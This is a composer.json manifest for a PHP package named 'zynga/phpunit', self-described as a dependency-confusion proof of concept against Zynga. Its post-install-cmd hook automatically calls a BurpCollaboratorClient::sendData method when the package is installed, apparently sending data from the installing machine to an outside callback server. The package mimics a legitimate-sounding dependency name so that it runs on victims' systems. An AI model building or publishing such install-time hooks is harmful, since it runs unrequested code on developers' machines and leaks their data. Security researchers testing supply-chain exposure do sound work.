{
    "name": "zynga/phpunit",
    "description": "Dependency c0nfusion poc for zynga",
    "license": "MIT",
    "version": "1.1",
    "require": {
    "php": ">=7.4"
	},
  "autoload": {
    "psr-4": {
      "MyNamespace\\": "src/"
    }
  },
  "scripts": {
    "post-install-cmd": [
      "MyNamespace\\BurpCollaboratorClient::sendData"
    ]
  }
}
